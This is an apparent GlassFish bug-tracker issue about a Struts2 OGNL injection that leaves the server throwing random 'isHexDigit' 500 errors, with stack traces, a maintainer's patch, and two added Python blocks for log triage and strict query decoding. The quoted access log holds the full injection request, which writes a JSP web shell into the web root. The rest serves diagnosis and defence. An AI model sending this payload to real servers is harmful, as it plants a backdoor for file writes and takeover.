GLASSFISH-20840

Apache Struts2 vulnerability causes Glassfish 4 server to throw random Http 500 Internal Error - "isHexDigit" exception

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 4.0
    • Fix Version/s: None
    • Component/s: None
    • Labels:
      None

      Description

      For background, see https://www.mandiant.com/blog/responding-attacks-apache-struts2/

      In testing the Struts 2.3.15.2 release fix under Glassfish 4 for the above vulnerability, subsequent to issuing the malicious http injection, Glassfish continues to throw random Http 500 Internal Server errors and an "isHexDigit" exception.

      Fix is to restart Glassfish.

      Glassfish Access Log:

      [Malicious injection]

      "127.0.0.1" "NULL-AUTH-USER" "01/Oct/2013:15:07:00 -0500" "GET /interscope/logon.action?redirect:$%7B%20req%3dcontext.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%20p%3d(req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll(%22////%22,%22/%22),%20new+java.io.BufferedWriter(new+java.io.FileWriter(p)).append(req.getParameter(%22c%22)).close()%20%7D&c=%3c%25%if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22/%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25 HTTP/1.1" 500 1389

      [many intervening successful requests..]

      [SUBSEQUENT USER REQUEST THROWS HTTP 500]

      "10.13.2.18" "NULL-AUTH-USER" "01/Oct/2013:15:08:12 -0500" "GET /interscope/browse.action?keys='design_contract.uid=8264|design_contract.project_sequence=8024|design_contract.designer_firm_id=951952590|designer.designer_firm_id=951952590|%20%20'&pageName=DesignerDetail&source=jsp HTTP/1.1" 500 1389

      Glassfish Server log:

      [HTTP 500 THROWN ON MALICIOUS INJECTION]

      [2013-10-01T15:07:00.550-0400] [glassfish 4.0] [WARNING] [] [javax.enterprise.web] [tid: _ThreadID=19 _ThreadName=http-listener-1(2)] [timeMillis: 1380654420550] [levelValue: 900] [[
      StandardWrapperValve[default]: Servlet.service() for servlet default threw exception
      java.lang.IllegalStateException: isHexDigit
      at org.glassfish.grizzly.http.util.URLDecoder.decode(URLDecoder.java:470)
      at org.glassfish.grizzly.http.util.Parameters.processParameters(Parameters.java:653)
      at org.glassfish.grizzly.http.util.Parameters.processParameters(Parameters.java:687)
      at org.glassfish.grizzly.http.util.Parameters.handleQueryParameters(Parameters.java:335)
      at org.glassfish.grizzly.http.server.Request.parseRequestParameters(Request.java:1995)
      at org.glassfish.grizzly.http.server.Request.getParameterNames(Request.java:1093)
      at org.apache.catalina.connector.Request.getParameterNames(Request.java:1591)
      at org.apache.catalina.connector.Request.getParameterMap(Request.java:1566)
      at org.apache.catalina.connector.RequestFacade.getParameterMap(RequestFacade.java:504)
      at org.apache.struts2.dispatcher.Dispatcher.createContextMap(Dispatcher.java:611)
      at org.apache.struts2.dispatcher.ng.PrepareOperations.createActionContext(PrepareOperations.java:78)
      at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:86)
      at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:256)
      at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:214)
      at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:316)
      at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:160)
      at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:734)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:673)
      at com.sun.enterprise.web.WebPipeline.invoke(WebPipeline.java:99)
      at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:174)
      at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:734)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:673)
      at org.apache.catalina.connector.CoyoteAdapter.doService(CoyoteAdapter.java:354)
      at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:260)
      at com.sun.enterprise.v3.services.impl.ContainerMapper.service(ContainerMapper.java:188)
      at org.glassfish.grizzly.http.server.HttpHandler.runService(HttpHandler.java:191)
      at org.glassfish.grizzly.http.server.HttpHandler.doHandle(HttpHandler.java:168)
      at org.glassfish.grizzly.http.server.HttpServerFilter.handleRead(HttpServerFilter.java:189)
      at org.glassfish.grizzly.filterchain.ExecutorResolver$9.execute(ExecutorResolver.java:119)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeFilter(DefaultFilterChain.java:288)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeChainPart(DefaultFilterChain.java:206)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.execute(DefaultFilterChain.java:136)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.process(DefaultFilterChain.java:114)
      at org.glassfish.grizzly.ProcessorExecutor.execute(ProcessorExecutor.java:77)
      at org.glassfish.grizzly.nio.transport.TCPNIOTransport.fireIOEvent(TCPNIOTransport.java:838)
      at org.glassfish.grizzly.strategies.AbstractIOStrategy.fireIOEvent(AbstractIOStrategy.java:113)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.run0(WorkerThreadIOStrategy.java:115)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.access$100(WorkerThreadIOStrategy.java:55)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy$WorkerThreadRunnable.run(WorkerThreadIOStrategy.java:135)
      at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.doWork(AbstractThreadPool.java:564)
      at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.run(AbstractThreadPool.java:544)
      at java.lang.Thread.run(Thread.java:724)
      ]]
      [HTTP 500 THROWN ON USER REQUEST]

      [2013-10-01T15:08:12.128-0400] [glassfish 4.0] [WARNING] [] [javax.enterprise.web] [tid: _ThreadID=19 _ThreadName=http-listener-1(2)] [timeMillis: 1380654492128] [levelValue: 900] [[
      StandardWrapperValve[default]: Servlet.service() for servlet default threw exception
      java.lang.IllegalStateException: isHexDigit
      at org.glassfish.grizzly.http.util.URLDecoder.decode(URLDecoder.java:470)
      at org.glassfish.grizzly.http.util.Parameters.processParameters(Parameters.java:653)
      at org.glassfish.grizzly.http.util.Parameters.processParameters(Parameters.java:687)
      at org.glassfish.grizzly.http.util.Parameters.handleQueryParameters(Parameters.java:335)
      at org.glassfish.grizzly.http.server.Request.parseRequestParameters(Request.java:1995)
      at org.glassfish.grizzly.http.server.Request.getParameterNames(Request.java:1093)
      at org.apache.catalina.connector.Request.getParameterNames(Request.java:1591)
      at org.apache.catalina.connector.Request.getParameterMap(Request.java:1566)
      at org.apache.catalina.connector.RequestFacade.getParameterMap(RequestFacade.java:504)
      at org.apache.struts2.dispatcher.Dispatcher.createContextMap(Dispatcher.java:611)
      at org.apache.struts2.dispatcher.ng.PrepareOperations.createActionContext(PrepareOperations.java:78)
      at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:86)
      at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:256)
      at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:214)
      at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:316)
      at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:160)
      at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:734)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:673)
      at com.sun.enterprise.web.WebPipeline.invoke(WebPipeline.java:99)
      at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:174)
      at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:734)
      at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:673)
      at org.apache.catalina.connector.CoyoteAdapter.doService(CoyoteAdapter.java:354)
      at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:260)
      at com.sun.enterprise.v3.services.impl.ContainerMapper.service(ContainerMapper.java:188)
      at org.glassfish.grizzly.http.server.HttpHandler.runService(HttpHandler.java:191)
      at org.glassfish.grizzly.http.server.HttpHandler.doHandle(HttpHandler.java:168)
      at org.glassfish.grizzly.http.server.HttpServerFilter.handleRead(HttpServerFilter.java:189)
      at org.glassfish.grizzly.filterchain.ExecutorResolver$9.execute(ExecutorResolver.java:119)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeFilter(DefaultFilterChain.java:288)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeChainPart(DefaultFilterChain.java:206)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.execute(DefaultFilterChain.java:136)
      at org.glassfish.grizzly.filterchain.DefaultFilterChain.process(DefaultFilterChain.java:114)
      at org.glassfish.grizzly.ProcessorExecutor.execute(ProcessorExecutor.java:77)
      at org.glassfish.grizzly.nio.transport.TCPNIOTransport.fireIOEvent(TCPNIOTransport.java:838)
      at org.glassfish.grizzly.strategies.AbstractIOStrategy.fireIOEvent(AbstractIOStrategy.java:113)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.run0(WorkerThreadIOStrategy.java:115)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.access$100(WorkerThreadIOStrategy.java:55)
      at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy$WorkerThreadRunnable.run(WorkerThreadIOStrategy.java:135)
      at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.doWork(AbstractThreadPool.java:564)
      at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.run(AbstractThreadPool.java:544)
      at java.lang.Thread.run(Thread.java:724)
      ]]
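
As an added example (my code, not part of this issue, GlassFish or Grizzly), the following triage script is run over the two access-log lines quoted above. It extracts the request line, flags the Struts 2 indicators the logon.action request carries (the `redirect:` parameter-prefix handler, the `${...}` OGNL expression, the xwork2 context lookup, and the java.io file-writing calls that drop css3.jsp into the web root), and reports every `%` that is not followed by two hex digits, which is the condition Grizzly's decoder rejects as `isHexDigit`. The two log lines are embedded as constructed sample input copied from this issue; the marker names and verdict labels are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the two access-log lines quoted in this issue.
ACCESS_LOG = [
    '''"127.0.0.1" "NULL-AUTH-USER" "01/Oct/2013:15:07:00 -0500" "GET /interscope/logon.action?redirect:$%7B%20req%3dcontext.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%20p%3d(req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll(%22////%22,%22/%22),%20new+java.io.BufferedWriter(new+java.io.FileWriter(p)).append(req.getParameter(%22c%22)).close()%20%7D&c=%3c%25%if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22/%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25 HTTP/1.1" 500 1389''',
    '''"10.13.2.18" "NULL-AUTH-USER" "01/Oct/2013:15:08:12 -0500" "GET /interscope/browse.action?keys='design_contract.uid=8264|design_contract.project_sequence=8024|design_contract.designer_firm_id=951952590|designer.designer_firm_id=951952590|%20%20'&pageName=DesignerDetail&source=jsp HTTP/1.1" 500 1389''',
]

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3})')

# Indicators of the Struts 2 OGNL injection seen in the log; the names are my own labels.
MARKERS = {
    "struts_param_prefix": re.compile(r"(?i)(?:^|&)(?:redirect|redirectAction|action|method):"),
    "ognl_expression":     re.compile(r"(?i)(?:\$|%24)(?:\{|%7b)"),
    "xwork_context":       re.compile(r"(?i)com\.opensymphony\.xwork2"),
    "file_write_api":      re.compile(r"(?i)java\.io\.(?:FileWriter|FileOutputStream|BufferedWriter)"),
}
# A '%' not followed by two hex digits: the condition Grizzly rejects as isHexDigit.
MALFORMED_PCT = re.compile(r"%(?![0-9A-Fa-f]{2})")


def verdict(markers, malformed, status):
    if markers:
        return "struts_ognl_injection"
    if malformed:
        return "malformed_encoding"
    if status >= 500:
        return "well_formed_but_5xx"   # input is fine; look at server-side state instead
    return "clean"


def analyze_line(line):
    """Return a finding dict for one access-log line, or None if no request line is found."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # Match markers on the raw query and on a lenient decode; unquote() leaves bad escapes untouched.
    views = (query, unquote(query))
    markers = sorted(name for name, rx in MARKERS.items() if any(rx.search(v) for v in views))
    malformed = [query[x.start():x.start() + 3] for x in MALFORMED_PCT.finditer(query)]
    status = int(m.group("status"))
    return {
        "client": line.split('"')[1],
        "path": path,
        "status": status,
        "ognl_markers": markers,
        "malformed_percent": malformed,
        "verdict": verdict(markers, malformed, status),
    }


def scan(lines):
    """Analyze every line that carries a request line."""
    return [r for r in map(analyze_line, lines) if r is not None]


if __name__ == "__main__":
    for finding in scan(ACCESS_LOG):
        print(finding)
```

The second line is the point of the issue: it carries no injection marker and no malformed escape, yet it was answered with a 500. When a well-formed request fails with the same decoder exception as an earlier malformed one, the input of the failing request is not where to look.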

        Activity

        Ryan Lubke added a comment -

        So far, given the information you've provided, I've been unable to trigger the error.

        So, I have a few questions:

        1) Are you able to reproduce this fairly easily in your environment, or is it very intermittent?
        2) If it is fairly easy for you to reproduce, would it be possible for you to package a test case that I can deploy
        locally to help facilitate a speedy resolution?

        Thanks

        Ryan Lubke added a comment -

        Please try the attached JAR. Backup the existing jar in $GF_HOME/modules and drop this one in its place.

        This doesn't 'fix' the isHexDigit exception as the query string in the log is invalid, but it will resolve the subsequent random failures on other query strings.

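
Ryan's point that the logged query string is invalid is worth making concrete. The `c` parameter begins `%3c%25%if(`: `%3c` and `%25` are well-formed escapes, but `%if` is not, and refusing it is correct. What the issue then reports is that well-formed requests handled later on the same worker thread (both server-log traces show `_ThreadID=19`) fail the same way until Glassfish is restarted. The added example below (my code, not Grizzly's or GlassFish's; the class and function names are assumptions) shows the contract a parameter parser should hold: a malformed escape is a client error answered with 400 rather than 500, and all parse state lives in the locals of a pure function that returns a fresh map, so a rejected request leaves nothing behind for the next one. It is run over the two query strings from this issue's access log, in the order they arrived.

```python
_HEX = frozenset("0123456789abcdefABCDEF")


class BadPercentEncoding(ValueError):
    """A '%' that is not followed by two hex digits. This is the condition
    Grizzly reports as 'isHexDigit'; here it is a typed client error."""

    def __init__(self, offset, fragment):
        super().__init__(f"invalid percent-escape {fragment!r} at offset {offset}")
        self.offset = offset
        self.fragment = fragment


def decode_strict(s):
    """Percent-decode one query component, failing closed on malformed escapes
    (urllib.parse.unquote would silently pass '%if' through unchanged)."""
    out = bytearray()
    i, n = 0, len(s)
    while i < n:
        ch = s[i]
        if ch == "%":
            frag = s[i:i + 3]
            if len(frag) < 3 or frag[1] not in _HEX or frag[2] not in _HEX:
                raise BadPercentEncoding(i, frag)
            out.append(int(frag[1:], 16))
            i += 3
        elif ch == "+":
            out.append(0x20)          # form-encoding convention: '+' is a space
            i += 1
        else:
            out.extend(ch.encode("utf-8"))
            i += 1
    return out.decode("utf-8", errors="replace")


def parse_query(raw):
    """Parse 'a=1&b=2' into {name: [values]}. The result is a fresh dict built
    from locals only, so a parse that raises leaves no partial state behind."""
    params = {}
    for pair in raw.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(decode_strict(name), []).append(decode_strict(value))
    return params


def handle_request(raw_query):
    """Request-level contract: a malformed escape is the client's fault (400),
    not an internal error (500), and it cannot affect any other request."""
    try:
        return 200, parse_query(raw_query)
    except BadPercentEncoding as e:
        return 400, {"error": str(e)}


def serve_sequence(queries):
    """Status codes for requests handled one after another on one worker."""
    return [handle_request(q)[0] for q in queries]


# Constructed sample input: the two query strings from this issue's access log.
MALICIOUS_QUERY = ("redirect:$%7B%20req%3dcontext.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),"
                   "%20p%3d(req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll(%22////%22,%22/%22),"
                   "%20new+java.io.BufferedWriter(new+java.io.FileWriter(p)).append(req.getParameter(%22c%22)).close()%20%7D"
                   "&c=%3c%25%if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream("
                   "application.getRealPath(%22/%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25")
USER_QUERY = ("keys='design_contract.uid=8264|design_contract.project_sequence=8024|"
              "design_contract.designer_firm_id=951952590|designer.designer_firm_id=951952590|%20%20'"
              "&pageName=DesignerDetail&source=jsp")

if __name__ == "__main__":
    for q in (MALICIOUS_QUERY, USER_QUERY, USER_QUERY):
        status, body = handle_request(q)
        print(status, body if status != 200 else sorted(body))
```

The first pair of the malicious query decodes cleanly to `redirect:${ req=context.get(...), p=(req.getRealPath("/")+"css3.jsp")..., new java.io.BufferedWriter(new java.io.FileWriter(p)).append(req.getParameter("c")).close() }`, which is the file-drop payload; the parse only stops at `%if` in the second pair. Because nothing is kept between calls, the user's browse.action query succeeds whether it arrives before or after the malicious one.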
        megioielli added a comment -

        Thanks Ryan. I will download the updated jar and retest for the exception.

        megioielli added a comment -

        The patch jarfile has resolved the subsequent "isHexDigit" exceptions.

        Thank you.

        To answer your original questions:

        1) Are you able to reproduce this fairly easily in your environment, or is it very intermittent?

        It is easy to reproduce after the offending injection is executed, but subsequent exceptions are random. Some requests process normally while others exception out; no consistency there.

        2) If it is fairly easy for you to reproduce, would it be possible for you to package a test case that I can deploy locally to help facilitate a speedy resolution?

        Unfortunately, no. This application is a production website that supports the State Construction Office for the State of North Carolina. It would require an entire installation of all components (web, clients, databases, etc.).


          People

          • Assignee:
            michael.y.chen
            Reporter:
            megioielli
          • Votes:
            0
            Watchers:
            0